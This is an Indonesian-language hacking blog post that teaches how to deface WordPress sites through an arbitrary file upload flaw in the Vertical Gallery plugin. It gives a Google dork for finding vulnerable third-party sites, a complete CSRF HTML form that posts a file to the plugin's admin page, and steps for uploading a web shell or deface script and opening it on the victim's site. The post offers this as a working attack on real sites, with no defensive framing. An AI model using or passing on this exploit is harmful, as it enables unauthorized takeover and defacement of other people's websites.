<center><b>cara deface wp arbitrary vertical gallery file upload vulnrability</b></center> - cowok tersakiti team

Latest

TUTORIAL,HACKING,DEFACE,BLOGGER,ANALIST,ARTICLES,NEWS

BANNER 728X90

Thursday, February 23, 2017

cara deface wp arbitrary vertical gallery file upload vulnrability


masih di seputar wordpress.
dan totorialnya kali ini ga jauh berbeda dengan artikel pertama saya.
kali ini saya akan memberika tutorial deface
menggunakan celah uploadify menggunakan csrf wordpress arbitrary vertical gallery
file upload vulnrability.,

ok langsung aja ke topik bahasan.
cara deface wp arbitrary vertical gallery file upload.
1. pertama tama yang perlu kita butuhkan adalah shel/script deface.
dan di sini aku anggap kalian udah punya shell/script sendiri.
kalau belum punya bisa download di sini.

2. notepad
di sini kita membutuhkan notepad karena nantinya untuk mengedit,
csrf yang kita gunakan untuk upload shell/script deface kita.

3. kalau semua alatnya udah siap langsung aja
kita cari targetnya menggunakan dork google.
di sini saya pake dork inurl:wp-content/plugins/wp-verticalgallery.
kalian bisa kembangin dorknya biar dapat banyak yang vuln.

4. masukin dork tadi ke google.
buka target yang keluar satu persatu ,
kalau keluar text xml seperti di bawah ini kemungkinan vuln dan bisa di deface.


5. selanjutnya buka notepad dan copy csrf di bawah ini lalu pastekan notepad.
copy link url web yang vuln tadi dan pastekan di csrf
yang ada di notepad tadi. lalu simpan dengan exstensi html.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/
admin.php?page=vertical_manage"
method="POST" enctype="multipart/form-data"> <input type="hidden" name="task"
value="vrt_add_new_album" /> <input type="hidden" name="album_name"
value="Arbitrary File Upload" /> <input type="hidden" name="album_desc"
value="Arbitrary File Upload" /> <input type="file" name="album_img"
value="" /> <input type="submit" value="Submit" /> </form> </body> </html>


6. buka csrf yang sudah di simpan jadi file html tadi menggunakan browser.

7. lalu upload shell/script deface yang sudah di persiapkan tadi.

kalau sukses nanti akan muncul url tempat file yang di upload tadi berada.

8. terakhir tinggal copy url yang keluar tadi dan pastekan
di belakang web target kita.
kalau berhasil nanti akan keluar tampilan shell/script deface kita.

No comments:

Post a Comment